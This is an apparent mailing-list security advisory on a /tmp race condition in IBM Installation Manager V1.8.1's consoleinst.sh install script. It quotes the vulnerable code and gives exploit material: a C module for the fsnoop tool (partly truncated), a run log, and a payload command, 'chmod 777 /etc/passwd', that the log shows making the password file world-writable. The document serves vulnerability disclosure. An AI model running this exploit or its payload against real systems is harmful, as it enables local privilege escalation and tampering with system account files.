[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

/tmp race condition in IBM Installation Manager V1.8.1 install script

Title: /tmp race condition in IBM Installation Manager V1.8.1 install script
Author: Larry W. Cashdollar, @_larry0
Date: 2015-10-29
Download Site: http://www-03.ibm.com/software/products/en/appserv-wasfordev
Vendor: IBM
Vendor Notified: 0000-00-00
Vendor Contact:
Description: IBM Installation Manager is a command line utility to install various software packages developed by IBM.

=====> IBM Installation Manager> Password required

Credentials are required to connect to the IBM download site. Enter IBM ID and password.

     P. Provide credentials and connect
     C. Cancel

Select 'P' to enter credentials and connect, or 'C' to cancel.

  Forgot your IBM ID?
  Forgot your password?
  IBM ID help and FAQ
-----> C
I noticed a /tmp race condition in IBM?s installation manager software install script
The code in consoleinst.sh is:

 46 TEMP=/tmp
 47 tempScript=$TEMP/consoleinst-$$.sh
 48 scriptLoc=`dirname "$0"`
 49 slash=`expr "$scriptLoc" : "\(/\)"`
 50 if [ "X$slash" != "X/" ]; then
 51         scriptLoc=`pwd`/$scriptLoc
 52 fi
 54 if [ "$0" != "$tempScript" ]; then
 55     cp "$0" "$tempScript"
 56     cd "$TEMP"
 57     origScriptLoc=$scriptLoc
 58     export origScriptLoc
 59     exec "$tempScript" $@
 60     # should not return from above exec
 61     exit 1
 62 fi

If you guess the pid and create the file before the installer script does you can inject code to be executed at line 59.

This is a log of me controlling permissions of the file during installation of the product:

[M] -rwxrwxrwx 1 larry larry 34  Thu Oct 29 21:46:10 2015 /tmp/consoleinst-9999.sh
[U] -rwxrwxrwx 1 larry larry 0  Thu Oct 29 21:46:34 2015 /tmp/consoleinst-10382.sh
[U] -rwxrwxrwx 1 larry larry 2225  Thu Oct 29 21:46:34 2015 /tmp/consoleinst-10382.sh

If I'm able to write to that file directly after it's modifed (inotify() for the win) I could inject commands into that installation script.
Exploit Code:
fsnoop v3.3 module for exploitation of: 
special thanks to v14dz for getting this working, and Mudge @dotmudge for pointing me
at his /tmp race condition tool l0pht-watch.
$ make ibm-console.so
/tmp/x is :
chmod 777 /etc/passwd
$ ./fsnoop -p ibm-consoleinst.so 
[+] ./ibm-consoleinst.so: ** IBM Console Install Exploit **
[+] ./ibm-consoleinst.so: payload=[0xb77775fb] file=[/tmp/consoleinst-HEREPID.sh]
[+] ./ibm-consoleinst.so: waiting for command: "/bin/sh ./consoleinst.sh"
[+] ./ibm-consoleinst.so: Exploitation done.
[+] ./ibm-consoleinst.so: Unloading module.
ls -l /etc/passwd
-rwxrwxrwx 1 root root 1901 Nov 22  2014 /etc/passwd
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
char title[] = "** IBM Console Install Exploit **";
/* filters */
char proc_name[] = "/bin/sh ./consoleinst.sh";
char file[]      = "/tmp/consoleinst-HEREPID.sh";
/* Evil routines */
void payload() { 
  int fd;
/*from v14dz: I use a fifo here, to unlock the paymod execution right after the cp command*/
  mkfifo(file, 0666);
  fd = open(file, O_RDONLY);
  rename(file, "/tmp/a");
  rename("/tmp/x", file);
Screen Shots:
Advisory: http://www.vapidlabs.com/advisory.php?v=156